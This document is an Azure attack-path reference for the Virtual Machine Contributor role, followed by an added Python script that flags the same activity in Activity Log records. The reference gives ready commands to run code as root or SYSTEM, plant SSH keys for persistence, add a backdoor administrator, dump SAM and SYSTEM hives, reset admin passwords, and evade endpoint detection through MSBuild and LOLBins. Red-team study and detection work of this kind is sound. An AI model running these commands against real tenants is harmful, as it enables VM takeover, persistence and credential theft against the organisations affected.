AZVMContributor

The source principal has the Virtual Machine Contributor role on the target VM, enabling full VM management, including running commands as SYSTEM/root.

Applies to: User / ServicePrincipal → AZVM


Linux Abuse

Run arbitrary command as root (Linux VM)

az login --service-principal -u <app-id> -p '<secret>' --tenant <tenant-id>

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunShellScript \
  --scripts "id && cat /root/root.txt"

Drop SSH key for persistence

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunShellScript \
  --scripts "mkdir -p /root/.ssh && echo '<your-pub-key>' >> /root/.ssh/authorized_keys && chmod 600 /root/.ssh/authorized_keys"

Run arbitrary command as SYSTEM (Windows VM)

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunPowerShellScript \
  --scripts "whoami; hostname; net user hacker P@ssw0rd123! /add; net localgroup administrators hacker /add"

Dump SAM/NTDS via run-command

az vm run-command invoke \
  --resource-group <resource-group> \
  --name <vm-name> \
  --command-id RunPowerShellScript \
  --scripts "reg save HKLM\SAM C:\sam.bak; reg save HKLM\SYSTEM C:\sys.bak"

Windows Abuse

PowerZure — run command

Connect-AzAccount -AccessToken <access-token> -AccountId <username>

# Execute arbitrary PowerShell as SYSTEM
Invoke-AzureRunCommand -ResourceGroup <resource-group> -VM <vm-name> -Command 'whoami'

# Run via MSBuild (evasion)
Invoke-AzureRunMSBuild -ResourceGroup <resource-group> -VM <vm-name>

# Execute a program
Invoke-AzureRunProgram -ResourceGroup <resource-group> -VM <vm-name> `
  -Program 'cmd.exe' -Arguments '/c whoami > C:\out.txt'

Az PowerShell — run command

Connect-AzAccount -AccessToken <access-token> -AccountId <username>

Invoke-AzVMRunCommand `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -CommandId RunPowerShellScript `
  -ScriptString 'whoami; hostname; ipconfig /all'

Reset VM admin password

$cred = Get-Credential
Set-AzVMAccessExtension `
  -ResourceGroupName <resource-group> `
  -VMName <vm-name> `
  -Name "VMAccessAgent" `
  -Credential $cred `
  -TypeHandlerVersion "2.0"

Az CLI — reset admin password

az vm user update \
  --resource-group <resource-group> \
  --name <vm-name> \
  --username Administrator \
  --password '<new-password>'

Opsec

  • run-command execution is logged in Azure Activity Log and leaves files under C:\Packages\Plugins\ on Windows.
  • PowerShell script block logging and command line logging on the VM will capture payload content.
  • EDR on the guest OS may flag process injection, MSBuild execution, or suspicious commands.
  • Use Invoke-AzureRunMSBuild or signed LOLBin delivery for EDR evasion.
  • Prefer dropping a scheduled task or SSH key over repeated run-command calls.
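Added detection example, not from the original page: it scans Activity Log records (in the EventData JSON shape `az monitor activity-log list -o json` returns) for the operations behind the run-command and password-reset steps above, and flags callers that repeat run-command. The two ARM operation names are my assumption of what the Activity Log records; the sample records are constructed.

```python
"""Flag Activity Log records for the abuse paths above: run-command invocations
and VMAccess extension writes (password / SSH-key resets). Sample data is constructed."""
from collections import Counter

# Assumption: ARM operation names the Activity Log records for run-command and VMAccess resets.
RUN_CMD = "Microsoft.Compute/virtualMachines/runCommand/action"
EXT_WRITE = "Microsoft.Compute/virtualMachines/extensions/write"
WATCHED_OPERATIONS = {RUN_CMD: "run-command invocation", EXT_WRITE: "extension write (VMAccess reset)"}

def vm_name_from_resource_id(resource_id):
    """Extension writes carry '.../virtualMachines/<vm>/extensions/<ext>'; return <vm>."""
    parts = resource_id.split("/")
    for i, part in enumerate(parts[:-1]):
        if part.lower() == "virtualmachines":
            return parts[i + 1]
    return resource_id

def flag_vm_contributor_abuse(events):
    """One finding per successful watched operation, deduplicated on correlationId (ARM emits Started + Succeeded)."""
    seen, findings = set(), []
    for ev in events:
        op = (ev.get("operationName") or {}).get("value", "")
        status = (ev.get("status") or {}).get("value", "")
        corr = ev.get("correlationId")
        if op not in WATCHED_OPERATIONS or status != "Succeeded" or corr in seen:
            continue
        seen.add(corr)
        findings.append({"time": ev.get("eventTimestamp"), "caller": ev.get("caller"),
                         "vm": vm_name_from_resource_id(ev.get("resourceId", "")),
                         "operation": op, "reason": WATCHED_OPERATIONS[op]})
    return findings

def repeat_callers(findings, threshold=2):
    """Callers with at least `threshold` run-command findings (the repeated calls the Opsec note mentions)."""
    counts = Counter(f["caller"] for f in findings if f["operation"] == RUN_CMD)
    return sorted(c for c, n in counts.items() if n >= threshold)

VM_PREFIX = "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg-prod/providers/Microsoft.Compute/virtualMachines/"
def _ev(op, status, corr, caller, suffix):  # constructed sample record, not real telemetry
    return {"operationName": {"value": op}, "status": {"value": status}, "correlationId": corr,
            "caller": caller, "eventTimestamp": "2024-05-01T10:00:00Z", "resourceId": VM_PREFIX + suffix}

SAMPLE_EVENTS = [
    _ev(RUN_CMD, "Started", "c1", "svc-deploy@example.onmicrosoft.com", "web01"),
    _ev(RUN_CMD, "Succeeded", "c1", "svc-deploy@example.onmicrosoft.com", "web01"),
    _ev(EXT_WRITE, "Succeeded", "c2", "svc-deploy@example.onmicrosoft.com", "web01/extensions/VMAccessAgent"),
    _ev("Microsoft.Compute/virtualMachines/start/action", "Succeeded", "c3", "ops@example.onmicrosoft.com", "web02"),
    _ev(RUN_CMD, "Succeeded", "c4", "svc-deploy@example.onmicrosoft.com", "web02"),
]
```

Feed it the real export instead of SAMPLE_EVENTS; a caller that appears in both a run-command finding and a VMAccess extension write on the same VM matches the full sequence documented above.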